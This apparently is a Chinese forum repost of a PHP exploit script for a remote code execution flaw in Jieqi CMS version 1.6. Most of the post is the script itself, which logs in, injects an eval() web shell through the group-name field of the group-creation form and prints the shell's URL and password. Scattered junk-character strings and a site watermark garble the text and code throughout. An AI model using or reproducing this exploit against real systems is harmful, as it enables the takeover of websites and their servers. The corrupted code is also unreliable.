杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
+ L) [& m6 B" I0 u: w4 c7 u8 s: V2 q! [: x# \! _# X8 t) ^
. Q7 ] p& j$ u X& I6 d该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。. a3 M* `2 O2 f% w
需要有一个能创建圈子的用户。5 L* m- R* A' r8 ] J) v
9 O6 z: |5 N7 A5 E<?php. J2 p- K( I# p; F
\& N3 J3 e# ?0 Q$ }) M" i$ o
print_r('
1 V+ x. h o+ x0 h+---------------------------------------------------------------------------+
Y4 O' k0 y* e' { N" K @Jieqi CMS V1.6 PHP Code Injection Exploit
6 e0 b' T u6 n( l/ i" w* a4 ]- kby flyh4t
0 R4 W) a- R2 w8 \* F4 m6 M. imail: phpsec at hotmail dot com
+ ]( b4 I: n/ d3 Q3 w6 O6 T3 Iteam: http://www.wolvez.org, ?& H! N2 p6 \" f8 v
+---------------------------------------------------------------------------+3 B' a2 J6 G7 c0 F3 I2 |
'); /**7 m2 z9 p" M6 _) f1 z. J
* works regardless of php.ini settings5 Z1 ~. k7 M, S0 ~) o* K
*/ if ($argc < 5) { print_r('
9 m$ _. L2 B! s1 e# \) j+---------------------------------------------------------------------------+1 K {4 `5 K: t* a# d0 @* t. E
Usage: php '.$argv[0].' host path username
3 g9 N; m. w7 M r; Hhost: target server (ip/hostname). t" }- b! [% {$ D( M, E
path: path to jieqicms
( N1 |+ s" o/ ]% z1 R) w4 V4 Buasename: a username who can create group8 g0 f+ }" K* n/ n
Example:+ c; F5 ?2 ]0 O
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
6 Z+ y3 [3 P3 y Y0 M/ q+---------------------------------------------------------------------------+/ S1 l; k: G5 _2 P
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
& b! t8 p: ^: \ I& CContent-Disposition: form-data; name="gname"
$ U6 i8 L; N4 C& T6 C# B0 w& c* d * E8 k, j: |2 ^
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
- G, a: X% x3 Z) l-----------------------------23281168279961
9 z; w0 ]5 q. l" M6 FContent-Disposition: form-data; name="gcatid"
1 |- V2 ?- v- ~; B% `$ [* h+ O
d! y8 i: ?$ n8 x1 {/ c1
+ C9 ]& }5 a) l4 A+ D" ]-----------------------------23281168279961( O2 G6 Z. y2 b5 M9 R
Content-Disposition: form-data; name="gaudit" Y4 O( I' @2 S: Y( \% m
$ s% z- c5 b* N U, \& H9 Y. e
12 {+ g& @$ Y9 D4 C
-----------------------------23281168279961
]( x, Z4 r- w8 H% ]. IContent-Disposition: form-data; name="gbrief"
; f s: g# X$ f3 J4 O3 A9 x 4 g. W$ o E2 T
1
1 C4 P$ F* T+ ]/ |: G-----------------------------23281168279961--
4 q- k! U" k* B. q/ I- x/ W. M" n'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
s8 u0 p# e* Y- d ( L# J$ u' B, w- Q) m
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对